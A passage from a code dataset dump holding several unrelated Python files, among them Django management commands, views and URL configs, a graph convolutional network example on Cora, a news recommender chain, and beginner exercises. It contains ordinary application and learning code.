    """Process exit codes: SUCCESS (0) when no errors, FAILURE (1) otherwise."""
    SUCCESS = 0
    FAILURE = 1


def reportStatusAndExit(errorCount, checkPrefix):
    """Print '<checkPrefix> <STATUS>' and terminate with the matching exit code.

    Any positive errorCount maps to FAILURE/1; zero maps to SUCCESS/0.
    """
    status = ExitStatus.FAILURE if errorCount > 0 else ExitStatus.SUCCESS
    print (f'{checkPrefix} {status.name}\n')
    exit(status.value)
|
11,080 | 70be91e52d55c099adf3dc4f9609a906782b965b | #倒序删除
# Because list elements always shift forward on removal, iterating in reverse
# is safe: elements not yet visited (and their indices) are unaffected even
# after later elements have been removed.
a=[1,2,3,4,5,6,7,8]
print(id(a))
# Walk from the last index down to 0, dropping every element <= 5.
for i in range(len(a)-1,-1,-1):
    if a[i]>5:
        pass
    else:
        # NOTE: remove() deletes the first equal element; that matches a[i]
        # here only because all values are distinct (del a[i] would be safer).
        a.remove(a[i])
# Same id as before: the list was modified in place.
print(id(a))
print('-----------')
print(a)
11,081 | 8294c6b2645cd92f6e445c54b59c76795074d505 | import time
import traceback
import django.core.mail
from constance import config
from django.conf import settings
from django.core import management
from django.db import transaction
from django.utils import translation
from polygon_client import Polygon, PolygonRequestFailedException
from modules.polygon import models
# How many seconds to wait before each retry attempt
RETRY_DELAY = [1, 4, 16]
# One initial attempt plus one retry per delay entry.
ATTEMPTS_COUNT = len(RETRY_DELAY) + 1
class Command(management.base.BaseCommand):
    """Management command that mirrors Polygon problems/contests locally."""
    help = 'Update problems metadata from Polygon'
    requires_migrations_checks = True
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.error = None
    def handle(self, *args, **options):
        """Run sync() with retries; mail the admins if every attempt fails."""
        translation.activate(settings.LANGUAGE_CODE)
        # TODO(artemtab): more granular retries. At least we shouldn't repeat
        # successful Polygon requests if something unrelated goes wrong.
        last_exception_trace = None
        for i in range(ATTEMPTS_COUNT):
            try:
                # Wait before retries
                if i > 0:
                    time.sleep(RETRY_DELAY[i - 1])
                self.sync()
                break
            except Exception:
                trace = traceback.format_exc()
                print(trace)
                last_exception_trace = trace
        else:
            # for/else: reached only when no attempt ever broke out (all failed).
            message = (
                'Error when syncing with polygon:\n\n{}'
                .format(last_exception_trace))
            django.core.mail.mail_admins('Sync with Polygon failed', message)
        return
    def sync(self):
        """
        Try to sync local polygon information with the actual Polygon.
        Throws an exception if something goes wrong.
        """
        p = Polygon(
            api_url=config.SISTEMA_POLYGON_URL,
            api_key=config.SISTEMA_POLYGON_KEY,
            api_secret=config.SISTEMA_POLYGON_SECRET,
        )
        # Problems
        problems = p.problems_list()
        print('Found {} problems in Polygon. Syncing...'.format(len(problems)))
        for polygon_problem in problems:
            self.update_problem(polygon_problem)
            print('.', end='', flush=True)
        print()
        # Contests: probe sequential ids until a long-enough gap of missing ones.
        print('Syncing contests')
        contest_id = 1
        last_updated_contest_id = 0
        while True:
            try:
                problem_set = p.contest_problems(contest_id)
                last_updated_contest_id = contest_id
                print('.', end='', flush=True)
            except PolygonRequestFailedException:
                print('_', end='', flush=True)
                # If at some point the specified number of contests in a row are
                # missing we consider that there are no more contests to sync.
                current_gap = contest_id - last_updated_contest_id
                if current_gap > config.SISTEMA_POLYGON_MAXIMUM_CONTEST_ID_GAP:
                    break
            # NOTE(review): when the fetch above failed, this reuses the previous
            # iteration's problem_set (and is undefined if the very first contest
            # fails) — looks unintended; verify whether failed ids should be skipped.
            self.update_contest(contest_id, problem_set)
            contest_id += 1
        print()
    @transaction.atomic
    def update_problem(self, polygon_problem):
        """Create/refresh the local Problem row for one Polygon problem."""
        local_problem = (
            models.Problem.objects
            .filter(polygon_id=polygon_problem.id)
            .prefetch_related('tags')
            .first())
        if local_problem is None:
            local_problem = models.Problem(
                polygon_id=polygon_problem.id,
            )
        prev_revision = local_problem.revision
        local_problem.revision = polygon_problem.revision
        local_problem.name = polygon_problem.name
        local_problem.owner = polygon_problem.owner
        local_problem.deleted = polygon_problem.deleted
        local_problem.latest_package = polygon_problem.latest_package
        # Fetch the expensive per-problem details only when the revision advanced.
        if prev_revision is None or local_problem.revision > prev_revision:
            self.update_problem_info(local_problem, polygon_problem)
        local_problem.save()
    def update_problem_info(self, local_problem, polygon_problem):
        """Copy detailed problem info (limits, statements, tags) from Polygon."""
        info = polygon_problem.info()
        local_problem.input_file = info.input_file
        local_problem.output_file = info.output_file
        local_problem.interactive = info.interactive
        local_problem.time_limit = info.time_limit
        local_problem.memory_limit = info.memory_limit
        local_problem.general_description = (
            polygon_problem.general_description())
        local_problem.general_tutorial = (
            polygon_problem.general_tutorial())
        polygon_tags = polygon_problem.tags()
        self.create_missing_tags(polygon_tags)
        local_problem.tags.set(polygon_tags)
    def create_missing_tags(self, tags):
        # Ensure every Polygon tag exists locally before tags.set() references it.
        for tag in tags:
            models.Tag.objects.get_or_create(tag=tag)
    @transaction.atomic
    def update_contest(self, contest_id, problem_set):
        """Mirror one contest's problem list (additions, removals, reordering)."""
        contest = (
            models.Contest.objects
            .filter(polygon_id=contest_id)
            .first())
        if contest is None:
            contest = models.Contest(polygon_id=contest_id)
            contest.save()
        # Remove problems deleted from contest
        (models.ProblemInContest.objects
         .filter(contest_id=contest_id)
         .exclude(problem_id__in=[problem.id
                                  for problem in problem_set.values()])
         .delete())
        # Add/update problems which were added or re-ordered
        for index, problem in problem_set.items():
            models.ProblemInContest.objects.update_or_create(
                contest_id=contest_id,
                problem_id=problem.id,
                defaults={'index': index},
            )
|
11,082 | fe093191102e2fab3d8b2d461b7807208f33674f | """
This example implements the experiments on citation networks from the paper:
Semi-Supervised Classification with Graph Convolutional Networks (https://arxiv.org/abs/1609.02907)
Thomas N. Kipf, Max Welling
using the convolutional layers described in:
Convolutional Neural Networks on Graphs with Fast Localized Spectral Filtering (https://arxiv.org/abs/1606.09375)
Michaël Defferrard, Xavier Bresson, Pierre Vandergheynst
"""
import numpy as np
from tensorflow.keras.callbacks import EarlyStopping
from tensorflow.keras.layers import Dropout, Input
from tensorflow.keras.losses import CategoricalCrossentropy
from tensorflow.keras.models import Model
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.regularizers import l2
from spektral.data.loaders import SingleLoader
from spektral.datasets.citation import Citation
from spektral.layers import ChebConv
from spektral.transforms import LayerPreprocess
# Load data
dataset = Citation("cora", transforms=[LayerPreprocess(ChebConv)])
# We convert the binary masks to sample weights so that we can compute the
# average loss over the nodes (following original implementation by
# Kipf & Welling)
def mask_to_weights(mask):
    """Convert a binary node mask into per-node sample weights.

    Each selected node gets weight 1/k (k = number of nonzero entries), so
    the weighted sum of per-node losses equals their mean — matching the
    original Kipf & Welling implementation.
    """
    n_selected = np.count_nonzero(mask)
    return mask / n_selected
weights_tr, weights_va, weights_te = (
mask_to_weights(mask)
for mask in (dataset.mask_tr, dataset.mask_va, dataset.mask_te)
)
# Parameters
channels = 16 # Number of channels in the first layer
K = 2 # Max degree of the Chebyshev polynomials
dropout = 0.5 # Dropout rate for the features
l2_reg = 2.5e-4 # L2 regularization rate
learning_rate = 1e-2 # Learning rate
epochs = 200 # Number of training epochs
patience = 10 # Patience for early stopping
a_dtype = dataset[0].a.dtype # Only needed for TF 2.1
N = dataset.n_nodes # Number of nodes in the graph
F = dataset.n_node_features # Original size of node features
n_out = dataset.n_labels # Number of classes
# Model definition
x_in = Input(shape=(F,))
a_in = Input((N,), sparse=True, dtype=a_dtype)
do_1 = Dropout(dropout)(x_in)
gc_1 = ChebConv(
channels, K=K, activation="relu", kernel_regularizer=l2(l2_reg), use_bias=False
)([do_1, a_in])
do_2 = Dropout(dropout)(gc_1)
gc_2 = ChebConv(n_out, K=K, activation="softmax", use_bias=False)([do_2, a_in])
# Build model
model = Model(inputs=[x_in, a_in], outputs=gc_2)
optimizer = Adam(learning_rate=learning_rate)
model.compile(
optimizer=optimizer,
loss=CategoricalCrossentropy(reduction="sum"), # To compute mean
weighted_metrics=["acc"],
)
model.summary()
# Train model
loader_tr = SingleLoader(dataset, sample_weights=weights_tr)
loader_va = SingleLoader(dataset, sample_weights=weights_va)
model.fit(
loader_tr.load(),
steps_per_epoch=loader_tr.steps_per_epoch,
validation_data=loader_va.load(),
validation_steps=loader_va.steps_per_epoch,
epochs=epochs,
callbacks=[EarlyStopping(patience=patience, restore_best_weights=True)],
)
# Evaluate model
print("Evaluating model.")
loader_te = SingleLoader(dataset, sample_weights=weights_te)
eval_results = model.evaluate(loader_te.load(), steps=loader_te.steps_per_epoch)
print("Done.\n" "Test loss: {}\n" "Test accuracy: {}".format(*eval_results))
|
11,083 | 5a439040e3c8a04b0f05663539aa0f68ffa81404 | import pandas as pd
from abc import *
from tqdm.auto import tqdm
class AbstractRecommend(metaclass=ABCMeta):
    """Base class for recommenders; provides the shared cut-off logic.

    Subclasses are expected to define ``self.last_model`` (bool) and call
    :meth:`calculate_recommend` from their ``recommend`` implementation.
    """
    def __init__(self):
        pass
    @abstractmethod
    def recommend(self):
        pass
    def calculate_recommend(self, frame, before_recommend_count, cutoff_recommend_count):
        """Trim the ranked ``frame`` to the number of articles this model may
        contribute.

        frame: DataFrame ranked best-first, with an 'article_id' column.
        before_recommend_count: articles already recommended by earlier
            models (the overall budget is 100 per user).
        cutoff_recommend_count: per-model cap; -1 means "no cap".
        """
        limit_recommend = 100 - before_recommend_count
        # The last model in the chain, or a model without a cap, fills the
        # remaining budget up to 100 recommendations.
        # FIX: the cap check used `is -1` (identity test on an int, which
        # only works by accident of CPython's small-int cache) — changed to
        # `== -1`. Also use the `cutoff_recommend_count` parameter instead of
        # silently ignoring it in favour of `self.cutoff_recommend_count`;
        # all in-file callers pass the attribute, so behaviour is unchanged.
        if self.last_model is True or cutoff_recommend_count == -1:
            return frame['article_id'].values[:limit_recommend].tolist()
        # If fewer candidates remain than the cap, return them all.
        recommend_count = min(limit_recommend, cutoff_recommend_count)
        if frame.shape[0] < recommend_count:
            return frame['article_id'].values.tolist()
        # Otherwise recommend exactly the capped amount.
        return frame['article_id'].values[:recommend_count].tolist()
class RandomBestRecommend(AbstractRecommend):
    """Fallback recommender: serves globally ranked "best" articles the user
    (and the whole audience, via ``read_list``) has not seen yet."""
    def __init__(self, recommend_frame, cutoff_recommend_count):
        # Pre-ranked global candidates and this model's per-user cap.
        self.recommend_frame = recommend_frame
        self.cutoff_recommend_count = cutoff_recommend_count
        self.last_model = False
    def set_last_model(self):
        """Mark this model as the final one in the recommendation chain."""
        self.last_model = True
    def recommend(self, read_list, user_id, before_recommend_count):
        """Return up to the allowed number of unread article ids."""
        # Exclude everything already read or recommended, then let the shared
        # cut-off logic trim the result.
        candidates = self.recommend_frame.query("article_id not in @read_list")
        return super().calculate_recommend(
            candidates, before_recommend_count, self.cutoff_recommend_count)
class BrunchRecommend(AbstractRecommend):
    """Driver that chains several recommender models per user, accumulating
    up to 100 article recommendations each while avoiding duplicates."""
    def __init__(self, user_list, read_frame, read_set=None):
        # user_list: users to produce recommendations for.
        # read_dict: user_id -> list of article_ids that user already read.
        self.user_list = user_list
        self.read_dict = read_frame.groupby('user_id')['article_id'].apply(list).to_dict()
        self.recommend_result = dict()
        #self.recommend_mixed_result = dict()
        # Articles recommended to anyone so far (used by RandomBestRecommend).
        self.all_read_set = set()
        if read_set is not None:
            self.all_read_set = read_set.copy()
    def make_result_frame(self):
        """Return the accumulated recommendations as a DataFrame with a
        'user_id' column followed by one column per recommendation slot."""
        temp = pd.DataFrame.from_dict(self.recommend_result).T.reset_index()
        return temp.rename(columns={'index':'user_id'})
    def recommend(self, model_list=None):
        """Run each model in ``model_list`` for every user, appending each
        model's output to the user's recommendation list."""
        try:
            if not model_list:
                raise Exception("model_list는 적어도 한 개 이상 있어야 합니다.")
            # The final model is allowed to fill whatever budget remains.
            model_list[-1].set_last_model()
            self.recommend_result.clear()
            #self.recommend_mixed_result.clear()
            for user in tqdm(self.user_list):
                self.recommend_result[user] = list()
                #self.recommend_mixed_result[user] = list()
                # Exclude articles the user already read (from the read file).
                try:
                    already_user_read = self.read_dict[user]
                except KeyError as e:
                    already_user_read = []
                # Run each model in the supplied model_list in order.
                for model in model_list:
                    # Each model performs its own recommend step.
                    if isinstance(model, RandomBestRecommend) is True:
                        # print("RandomBestRecommend")
                        # Global fallback: also exclude articles recommended
                        # to ANY user so far, not just this user's history.
                        read_list = list(self.all_read_set) + already_user_read
                        r = model.recommend(read_list, user, len(self.recommend_result[user]))
                        # print(len(r))
                    else:
                        # Build the exclusion list from what this user read
                        # plus what was already recommended to them.
                        read_list = self.recommend_result[user].copy()
                        read_list = read_list + already_user_read
                        read_list = list(set(read_list))
                        r = model.recommend(read_list, user, len(self.recommend_result[user]))
                    # recommend
                    self.recommend_result[user] = self.recommend_result[user] + r
                    self.all_read_set = self.all_read_set.union(set(r))
                    #self.recommend_mixed_result[user].append(r)
        except Exception as e:
            print(e)
            raise
    def _ndcg(self):
        # Placeholder: evaluation metrics not implemented.
        pass
    def _map(self):
        pass
    def _entropy_diversity(self):
        pass
    def evaluate(self):
        pass
class TimebasedRecommend(AbstractRecommend):
    """Recommender that ranks articles popular on the dates ('dt') the user
    was active ('from' values in ``user_frame``)."""
    def __init__(self, user_frame, timebased_frame, cutoff_recommend_count):
        self.timebased_frame = timebased_frame
        self.user_frame = user_frame
        self.cutoff_recommend_count = cutoff_recommend_count
        self.last_model = False
    def set_last_model(self):
        """Mark this model as the final one in the recommendation chain."""
        self.last_model = True
    def recommend(self, read_list, user_id, before_recommend_count):
        """Return unread articles ranked by per-date popularity, interleaved
        across the dates the user visited."""
        user_frame = self.user_frame.loc[self.user_frame['user_id']==user_id]
        from_list = sorted(user_frame['from'].unique())
        if len(from_list) == 0:
            return list()
        frame = self.timebased_frame.query("article_id not in @read_list")
        # Rank articles within each visited date, then interleave the dates
        # by that per-date rank ('index'), ties broken by higher 'count'.
        frame_list = []
        for t in from_list:
            temp = frame.loc[frame['dt']==t].reset_index(drop=True)
            temp['index'] = range(temp.shape[0])
            frame_list.append(temp)
        frame = pd.concat(frame_list)
        frame = frame.sort_values(['index','count'], ascending=[True,False])
        frame = frame.drop_duplicates('article_id', keep='first')
        # Apply the shared recommendation limit.
        return super().calculate_recommend(frame, before_recommend_count, self.cutoff_recommend_count)
class CutoffRecommend(AbstractRecommend):
    """
    A recommender with a per-model cut-off.
    Models inheriting AbstractRecommend must implement ``recommend``.
    recommend_frame: preprocessed recommendation frame for this model.
    cutoff_recommend_count: per-model cap; -1 means no cap — recommend up to
        100 minus the number already recommended by earlier models.
    continous_read: True for a "continuous" model carrying a flag_sum column,
        False otherwise. (Previously there were flag_sum_1..5 columns; this
        was changed to a single flag_sum column holding 1..n. A higher
        flag_sum must always mean a better candidate.)
    """
    def __init__(self, recommend_frame, cutoff_recommend_count, userbased_model=True, continous_read=False, under_recommend=999):
        self.recommend_frame = recommend_frame
        self.cutoff_recommend_count = cutoff_recommend_count
        self.continous_read = continous_read
        self.userbased_model = userbased_model
        self.last_model = False
        # Skip this model entirely once more than `under_recommend` articles
        # have already been recommended for the user.
        self.under_recommend = under_recommend
    def set_last_model(self):
        """Mark this model as the final one in the recommendation chain."""
        self.last_model = True
    def recommend(self, read_list, user_id, before_recommend_count):
        """
        parameter
            read_list: articles already recommended by earlier models plus
                the articles the user read between 2/22 and 3/1
            user_id: user-based models select rows for this user only
            before_recommend_count: number of articles recommended so far
        return
            list of article_id
        """
        if self.under_recommend < before_recommend_count:
            return list()
        # Drop previously recommended / read articles.
        #frame = self.recommend_frame.loc[~self.recommend_frame['article_id'].isin(read_list)]
        # User-based models only consider rows belonging to this user.
        if self.userbased_model is True:
            frame = self.recommend_frame.query("user_id == @user_id")
            frame = frame.query("article_id not in @read_list")
        else:
            frame = self.recommend_frame.query("article_id not in @read_list")
        # Continuous model carrying a flag_sum column.
        if self.continous_read is True:
            # Higher flag_sum and higher count are better, so sort both
            # descending; article_number ascending as the final tie-breaker.
            frame = frame.sort_values(by=['flag_sum', 'count','article_number'], ascending=[False, False, True])
        return super().calculate_recommend(frame, before_recommend_count, self.cutoff_recommend_count)
|
11,084 | ab3678938de30d32401f44444ae5381121e5dcac | import re
"""
First Task
"""
# Initial Persons
persons_list = []
for index in range(1, 4):
print(f"Person number {index}:")
person = {
'name': input('Enter your name\n'),
'age': int(input('Enter your age\n'))
}
persons_list.append(person)
# 1)
for person in persons_list:
if person['age'] < 27:
person['name'] = 'Jimmy Hendrix'
print(persons_list)
# 2)
for person in persons_list:
if 't' in person['name'].lower():
person['age'] += 1
print(f"""Happy bday {person['name']}
Your are {person['age']} years old.""")
# 3)
counter = 0
while counter < persons_list[0]['age']:
if not counter % 2 == 0:
print(counter)
counter += 1
# 4)
e_letter = 'e'
for person in persons_list:
if e_letter in person['name'].lower():
lower_person = person['name'].lower()
if lower_person.startswith(e_letter):
print(f"{e_letter} in index 0")
elif lower_person[1] == e_letter:
print(f"{e_letter} in index 1")
else:
print(f"{e_letter} in index {person['name'].find(e_letter)}")
"""
Second Task
"""
# Initial Time
time = int(input('Enter time in minutes'))
# 1)
hours = int(time / 60)
minutes = time - (hours * 60)
print(f"hours: {hours}, minutes: {minutes}")
# 2)
if hours >= 1:
if hours < 2:
print("Ok...")
else:
print("Trilogy")
# 3)
if minutes > hours:
if minutes % 2 == 0:
hours *= 2
else:
minutes -= 1
else:
print(hours)
print(f"Hours: {hours}, Minutes: {minutes}")
"""
Third Task
"""
# Creating the file
file_content = """
My my candle candle burns at both ends;
It will not last the night;
But ah, my foes, and oh, my friends—
It gives a lovely light!
"""
file_path = "file.txt"
with open(file_path, mode='w') as my_file:
my_file.write(file_content)
# Reading the file
with open(file_path, mode='r') as my_file:
reading_content = my_file.read()
# 1)
all_words = reading_content.split()
# 2)
all_words_set = set({})
#
for word in all_words:
word = re.sub(r"[^A-Za-z]+", "", word)
all_words_set.add(word.lower())
# 3)
for word in all_words_set:
if word.startswith('t'):
print(f"Word ({word}) starts with 't'")
# 4)
for word in all_words_set:
if word.lower().startswith('a'):
print(f"Word: {word}")
print("Letters:")
for letter in word:
print(letter)
# 5) Short way
words_tuple = tuple(word for word in all_words if 'a' not in word.lower())
print(words_tuple)
# 5) Long way
to_be_tuple = []
for word in all_words:
if 'a' not in word.lower():
to_be_tuple.append(word)
to_be_tuple = tuple(to_be_tuple)
print(to_be_tuple)
# 6) Short way
new_e_words = [e_word.replace('e', '3') for e_word in all_words_set if 'e' in e_word]
print(new_e_words)
# 6) Long way
e_to_3 = []
for word in all_words_set:
if 'e' in word:
new_word = word.replace('e', '3')
e_to_3.append(new_word)
print(e_to_3)
|
11,085 | d55d4ca4f4ed3732620bcfa059ae85af6689b919 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import reverse, render, HttpResponseRedirect, get_object_or_404,HttpResponse
import json
from .models import Device, Log
import logging
from django.contrib import messages
logger = logging.getLogger('stable')
# Create your views here.
# Home page
def index(request):
    """Render the device overview plus a count of devices pending approval."""
    if request.method == 'POST':
        # NOTE(review): a POST request falls through and returns None, which
        # Django turns into an error — confirm this path is intentional.
        pass
    else:
        devices = Device.objects.all()
        devices_in_loading = len(Device.objects.filter(status=u'待批准'))
        return render(request, 'Stable/index.html', context={
            'devices' : devices,
            'devices_in_loading' : devices_in_loading,
        })
# Status transition: unused -> pending approval
def submit(request):
    """AJAX endpoint: a user applies for an unused device slot.

    On success the device moves to the "pending approval" ('待批准') state
    and the action is logged; if the slot was already taken, a warning
    message is queued and the user is redirected to the index.
    """
    if request.is_ajax() and request.method == "POST":
        ret = {'status':'', 'error':1, 'user':'', 'information':'','isAdmin':'','ip':'','expiration':''}
        pk = request.POST.get("pk")
        information = request.POST.get("content")
        expiration = request.POST.get("expiration")
        device = get_object_or_404(Device, pk=pk)
        if device.status == '未使用':
            # Slot is free: claim it for the current user.
            ret['error'] = 0
            device.information = information
            device.expiration = expiration
            device.user = request.user.nickname
            device.status = '待批准'
            device.save()
            ret['user'] = device.user
            ret['information'] = device.information
            ret['expiration'] = device.expiration
            ret['ip'] = device.ip
            info = '{0}申请{1}点位成功,待管理员{2}批准\r'.format(request.user.nickname, device.location, device.admin)
            logger.info(info)
            Log.objects.create(handler=request.user.nickname, content=info)
        else:
            # Someone else already applied for this slot.
            messages.warning(request, "操作失败,该点位已经被{0}申请使用".format(device.user))
            return HttpResponseRedirect(reverse('Stable:index'))
        ret['isAdmin'] = request.user.isAdminStable
        ret['status'] = device.status
        return HttpResponse(json.dumps(ret))
    else:
        return HttpResponseRedirect(reverse('Stable:index'))
# Status transition: pending approval -> in use
def approve(request):
    """AJAX endpoint: an admin approves a pending device application,
    moving the device to the "in use" ('使用中') state."""
    if request.is_ajax() and request.method == "POST":
        pk = request.POST.get("pk")
        ret = {'error':1, 'status':''}
        device = get_object_or_404(Device, pk=pk)
        if device.status == '待批准':
            ret['error'] = 0
            device.status = '使用中'
            device.save()
            info = '管理员{2}批准{0}的使用{1}点位申请\r'.format(device.user, device.location, request.user.nickname)
            logger.info(info)
            Log.objects.create(handler=request.user.nickname, content=info)
        else:
            # Already approved, or the applicant cancelled in the meantime.
            messages.warning(request, "操作失败,该点位已经被批准或者用户取消了申请")
            return HttpResponseRedirect(reverse('Stable:index'))
        ret['status'] = device.status
        return HttpResponse(json.dumps(ret))
    else:
        return HttpResponseRedirect(reverse('Stable:index'))
# Status transitions: in use -> unused, and pending approval -> unused
def delete(request):
    """AJAX endpoint: release a device slot back to the unused state.

    Allowed for the slot's current user or any Stable admin; otherwise the
    request is rejected with a warning message.
    """
    if request.is_ajax() and request.method == "POST":
        ret = {'error':1, 'status':'', 'isAdmin':'', 'ip':''}
        pk = request.POST.get("pk")
        device = get_object_or_404(Device, pk=pk)
        if request.user.nickname == device.user or request.user.isAdminStable:
            # Owner or admin: clear the slot.
            ret['error'] = 0
            device.status = '未使用'
            device.information = ''
            device.user = ''
            device.save()
            info = '点位{0}由{1}重置为未使用状态\r'.format(device.location, request.user.nickname)
            logger.info(info)
            Log.objects.create(handler=request.user.nickname, content=info)
        elif not device.user:
            # Nothing to release: the slot is already unused.
            messages.warning(request, "操作失败,该点位已经处于未使用状态了")
            return HttpResponseRedirect(reverse('Stable:index'))
        else:
            # Slot belongs to another user and the requester is not an admin.
            messages.warning(request, "操作失败,该点位已经被{0}申请使用".format(device.user))
            return HttpResponseRedirect(reverse('Stable:index'))
        ret['isAdmin'] = request.user.isAdminStable
        ret['status'] = device.status
        ret['ip'] = device.ip
        return HttpResponse(json.dumps(ret))
    else:
        return HttpResponseRedirect(reverse('Stable:index'))
# Log listing
def log(request):
    """Render the full audit log of device status changes."""
    logs = Log.objects.all()
    return render(request, 'Stable/log.html', context={
        'logs' : logs,
    })
11,086 | a9b1302769e974f48fc6128b8579002440ad0408 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-05-22 13:08
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: updates the ``Log`` model's Meta options
    (default ordering by newest first, ``get_latest_by`` on reg_datetime).
    Schema is unchanged."""

    dependencies = [
        ('seats', '0026_auto_20180510_1801'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='log',
            options={'get_latest_by': 'reg_datetime', 'ordering': ['-created_at']},
        ),
    ]
|
11,087 | a62f2877e6e702b13e237e67b2dda7ee52feb89c | # CodeUp #1116
# Read two integers from one line of input.
a, b = map(int, input().split())
# %-style formatting (note: a/b is a true division float; %d truncates it).
print('%d+%d=%d' %(a, b, a+b))
print('%d-%d=%d' %(a, b, a-b))
print('%d*%d=%d' %(a, b, a*b))
print('%d/%d=%d' %(a, b, a/b))
# Same arithmetic using str.format (positional indices in the subtraction).
print('{}+{}={}'.format(a, b, a+b))
print('{2}-{1}={0}'.format(a-b, b, a))
print('{}*{}={}'.format(a, b, a*b))
print('{}/{}={}'.format(a, b, int(a/b)))
11,088 | 36c6f865856bd5d3c25e84e9c04c8d2d24d72ac9 | # -*- coding: utf-8 -*-
from django.shortcuts import render
from django.http.response import HttpResponse
from .models import Candidate
# Create your views here.
def index(request):
    """List all candidates on the elections index page."""
    candidates = Candidate.objects.all()
    context = {'candidates':candidates}
    return render(request,'elections/index.html', context)
def areas(request, area):
    """Placeholder view: echoes the requested area name as plain text."""
    return HttpResponse(area)
11,089 | 7d872eee093f2ba481356929c29a4aa924e314e1 | from decorator_include import decorator_include
from django.conf import settings
from django.conf.urls.i18n import i18n_patterns
from django.conf.urls.static import static
from django.contrib.auth import views as auth_views
from django.urls import include, path, re_path
from django.views import defaults
from django.views.generic import TemplateView
from django.views.generic.base import RedirectView
from django.views.i18n import JavaScriptCatalog
from social_core.utils import setting_name
from announcements import urls as announcements_urls
from checkin import urls as checkin_urls
from contentbox.views import ContentBoxDetailView, ContentBoxUpdateView
from dataporten.views import login_wrapper
from faq import urls as faq_urls
from groups import urls as groups_urls
from make_queue import urls as make_queue_urls
from make_queue.forms.reservation import ReservationListQueryForm
from makerspace import urls as makerspace_urls
from news import urls as news_urls
from users import urls as users_urls
from util.url_utils import ckeditor_uploader_urls, debug_toolbar_urls, logout_urls, permission_required_else_denied
from util.view_utils import RedirectViewWithStaticQuery
from . import views
extra = "/" if getattr(settings, setting_name('TRAILING_SLASH'), True) else ""
urlpatterns = [
path("robots.txt", TemplateView.as_view(template_name='web/robots.txt', content_type='text/plain')),
path(".well-known/security.txt", TemplateView.as_view(template_name='web/security.txt', content_type='text/plain')),
*debug_toolbar_urls(),
path("i18n/", include('django.conf.urls.i18n')),
*static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT), # For development only; Nginx is used in production
*ckeditor_uploader_urls(),
]
admin_urlpatterns = [
path("", views.AdminPanelView.as_view(), name='admin_panel'),
# App paths, sorted by app label (should have the same path prefixes as the ones in `urlpatterns` below):
path("announcements/", include(announcements_urls.adminpatterns)),
path("checkin/", include(checkin_urls.adminpatterns)),
path("faq/", include(faq_urls.adminpatterns)),
path("committees/", include(groups_urls.adminpatterns)),
path("reservation/", include(make_queue_urls.adminpatterns)),
path("makerspace/", include(makerspace_urls.adminpatterns)),
path("news/", include(news_urls.adminpatterns)),
]
admin_api_urlpatterns = [
# App paths, sorted by app label (should have the same path prefixes as the ones in `urlpatterns` below):
path("checkin/", include(checkin_urls.adminapipatterns)),
path("news/", include(news_urls.adminapipatterns)),
path("users/", include(users_urls.adminapipatterns)),
]
api_urlpatterns = [
# This internal permission is only used for base-level access control;
# each included path/view should implement its own supplementary access control
path("admin/", decorator_include(permission_required_else_denied('internal.is_internal'), admin_api_urlpatterns)),
# App paths, sorted by app label (should have the same path prefixes as the ones in `urlpatterns` below):
path("reservation/", include(make_queue_urls.apipatterns)),
]
content_box_urlpatterns = [
path("<int:pk>/change/", ContentBoxUpdateView.as_view(base_template='web/base.html'), name='content_box_update'),
]
about_urlpatterns = [
path("", views.AboutUsView.as_view(url_name='about'), name='about'),
ContentBoxDetailView.get_path('contact'),
]
urlpatterns += i18n_patterns(
path("", views.IndexPageView.as_view(), name='index_page'),
# This internal permission is only used for base-level access control;
# each included path/view should implement its own supplementary access control
path("admin/", decorator_include(permission_required_else_denied('internal.is_internal'), admin_urlpatterns)),
path("api/", include(api_urlpatterns)),
# App paths, sorted by app label:
path("announcements/", include('announcements.urls')),
path("checkin/", include('checkin.urls')),
path("faq/", include('faq.urls')),
path("committees/", include('groups.urls')),
path("reservation/", include('make_queue.urls')),
path("makerspace/", include('makerspace.urls')),
path("news/", include('news.urls')),
# ContentBox paths:
path("contentbox/", include(content_box_urlpatterns)),
path("about/", include(about_urlpatterns)),
*ContentBoxDetailView.get_multi_path('apply', 'søk', 'sok'),
ContentBoxDetailView.get_path('cookies'),
ContentBoxDetailView.get_path('privacypolicy'),
# This path must be wrapped by `i18n_patterns()`
# (see https://docs.djangoproject.com/en/stable/topics/i18n/translation/#django.views.i18n.JavaScriptCatalog)
path("jsi18n/", JavaScriptCatalog.as_view(), name='javascript_catalog'),
prefix_default_language=False,
)
# Configure login based on if we have configured Dataporten or not.
if settings.USES_DATAPORTEN_AUTH:
urlpatterns += i18n_patterns(
path("login/", RedirectView.as_view(url="/login/dataporten/", query_string=True), name='login'),
# This line must come before including `social_django.urls` below, to override social_django's `complete` view
re_path(rf"^complete/(?P<backend>[^/]+){extra}$", login_wrapper),
path("", include('social_django.urls', namespace='social')),
prefix_default_language=False,
)
else:
# If it is not configured, we would like to have a simple login page. So that
# we can test with non-superusers without giving them access to the admin page.
urlpatterns += i18n_patterns(
path("login/", auth_views.LoginView.as_view(
template_name='web/login.html',
redirect_authenticated_user=True,
# This allows the `next` query parameter (used when logging in) to redirect to pages on all the subdomains
success_url_allowed_hosts=set(settings.ALLOWED_REDIRECT_HOSTS),
), name='login'),
prefix_default_language=False,
)
urlpatterns += logout_urls()
Owner = ReservationListQueryForm.Owner
# --- Old URLs ---
# URLs kept for "backward-compatibility" after paths were changed, so that users are simply redirected to the new URLs.
# These need only be URLs for pages that are likely to have been linked to, and that are deemed important to keep working.
urlpatterns += i18n_patterns(
path("rules/", RedirectView.as_view(pattern_name='rules', permanent=True)),
path("reservation/", RedirectView.as_view(pattern_name='machine_list', permanent=True)),
path("reservation/<int:year>/<int:week>/<int:pk>/",
RedirectView.as_view(url='/reservation/machines/%(pk)s/?calendar_year=%(year)s&calendar_week=%(week)s', permanent=True)),
path("reservation/me/", RedirectViewWithStaticQuery.as_view(pattern_name='reservation_list', query={'owner': Owner.ME}, permanent=True)),
path("reservation/admin/", RedirectViewWithStaticQuery.as_view(pattern_name='reservation_list', query={'owner': Owner.MAKE}, permanent=True)),
path("reservation/slots/", RedirectView.as_view(pattern_name='reservation_find_free_slots', permanent=True)),
